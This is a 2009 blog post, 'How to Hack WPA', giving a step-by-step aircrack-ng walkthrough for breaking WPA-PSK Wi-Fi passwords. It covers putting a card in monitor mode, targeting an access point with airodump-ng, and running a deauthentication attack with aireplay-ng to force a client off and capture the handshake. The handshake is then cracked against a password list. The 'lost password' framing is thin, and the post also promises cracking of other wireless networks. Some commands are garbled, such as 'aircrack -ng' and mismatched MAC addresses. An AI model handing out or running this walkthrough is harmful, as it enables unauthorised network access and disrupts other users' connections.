Tuesday, June 9, 2009

How to Hack WPA




This is for security if u lost ur router's password..... I DO NOT TAKE ANY RESPONSIBILITY FOR ANYTHING HAPPENED AFTER READING THIS GUIDE ok... This is a good one, let me tell you! There can be so many issues setting up your box to actually get the tools working and i'm not even touching on that, but if you can get everything to work, you'll be cracking wireless networks like a pro in no time.

Tools
******
I've been really, really successful with basically one tool set called AirCrack. Download that.

Kismet is an excellent tool for sniffing out wireless networks as well and could prove useful. that can be download it here

NetStumbler is a Windows-based wireless tool that will detect wireless network and mark their relative position with a GPS NetStumber uses an 802.11 Probe Request sent to the broadcast destination address which causes all access point in the area to issue an 802.11 Probe Response containing network configuration information, such as their SSID and WEP status. When hooked up to a GPS NetStumbler will record a GPS coordinate for the highest signal strength found for each access point. and can be found here

An encrypted wireless network. We'll be working on WEP encrypted networks as well as static passkey WPA or WPA-PSK

Note: Make sure you can get your card into monitor mode (sometimes called raw monitor or rfmon). This is VERY important

WPA is an encryption algorithm that takes care of a lot of the vunerablities inherent in WEP. WEP is, by design, flawed. No matter how good or crappy, long or short, your WEP key is, it can be cracked. WPA is different. A WPA key can be made good enough to make cracking it unfeasible. WPA is also a little more cracker friendly. By capturing the right type of packets, you can do your cracking offline. This means you only have to be near the AP for a matter of seconds to get what you need. Advantages and disadvantages.

WPA basically comes in two flavours RADIUS or PSK. PSK is crackable, RADIUS is not so much.
PSK uses a user defined password to initialize the TKIP, temporal key integrity protocol. There is a password and the user is involved, for the most part that means it is flawed. The TKIP is not really crackable as it is a per-packet key but upon the initialization of the TKIP, like during an authentication, we get the password (well the PMK anyways). The reason this is different from WEP, is because in WEP cracking, you simply crack the key, you don't need to intercept the key, its already there, you just decrypt it with enough IV's. However, in WPA/WPA2, you need to wait for a handshake to authenticate, this means you need to wait for someone to successfully join the network using the password, and aircrack will grab the handshake encryption, and use that.

you need to bring down your wireless interface so you can modify it. Mine is rausb0, so I would type 'ifconfig rausb0 down' (That part I cut out of the image below, oops).

The commands are explained below

- modprobe -r rt73
- modprobe rt73

Bring the wireless interface back up

- ifconfig rausb0 up

Change the rate of the wireless interface to 1M, this helps a lot, but its not required. It does solve some other problems you would encounter if you don't do this.

- iwconfig rausb0 rate 1M

Bring rausb0 into monitoring mode

- airmon-ng rausb0 start

Look for your network, I am doing this at my own house, with another computer on the LAN, thus I know exactly what I am looking for.

Type the following command into the CLI or CMD to start monitoring the network(s).

- airodump-ng rausb0

This command will list the networks around you, there mac addresses, there network names, and there security method/encryption type (WPA, WPA2, WEP, OPN, we are looking for WPA or WPA2). Here is a screenshot of what you should see, it wont be exact, obviously, because you aren't in my house

See the MAC 00:00:00:00:00:F1, thats my network! Once you see the network you are looking for, hit ctrl+c to stop the search, so you can copy the MAC.

NOTE: The list of networks, you see MAC address 00:00:00:00:00:01 is connected to AP 00:00:00:00:00:F1. That is the other wireless laptop, on the network. You can view all network connections. For WPA, you will need to intercept the authentication.

Focus and capture packets of the AP you are looking at (Leave running open new terminal for further commands). Type the following command

- airodump-ng -c 1 -w psk --bssid 00:00:00:00:00:F1 rausb0

Where -c specifies the channel 1, psk is the file it will write the data to, and --bssid is the MAC of the AP.

This is the tough part.. You need to either wait for someone to try to connect to the network and type the password, or you need to try a de-authentication attack against a client that is already connected.

I have tried a de-authentication attack, but it seems my wireless card is unable to do so. But to try it, this is the following command.

- aireplay-ng -0 -a -c
so if I were to try it, with 1 try (you can even try 10, whateve you want), with the AP 00:00:00:00:00:F1, and the client 00:00:00:00:00:01, it would look like this:

- aireplay-ng -0 1 -a 00:1D:7E:98:30:F1 -c 00:1C:10:EA:03:31 rausb0

What this does exactly is attempts to kick the user off of the network, thus forcing them to rejoin the network, that is where you will capture the HANDSHAKE.

Once you see "WPA Handshake " in the upper right of the monitor mode, then you have successfully captured a handshake, which means someone else joined the network while you were monitoring it, and you captured the encrypted password!

Cracking the password.. You will need a password list. A good one too! Here is the cool thing, you are not actually trying to join the network with your passwords, you are simply encrypting the passwords in your password list in the same way your handshake is encrypted, and comparing them.

Remember earlier we named the file that the data was being written to 'psk'?... alright, just making sure, because you are going to need the name of whatever you named it, (name doesnt matter).
Type the following command into your CLI or CMD:

- aircrack -ng -w passwordlist.txt filename*.cap

So my password list is called english.txt, and my filename is psk, thus I can use psk*.cap. (I add a * after the psk, because it will have a number after the file).

Thats about it 

2 comments:

  1. if i my ask what dictionary file are you looking for so that we could help you out...

    ReplyDelete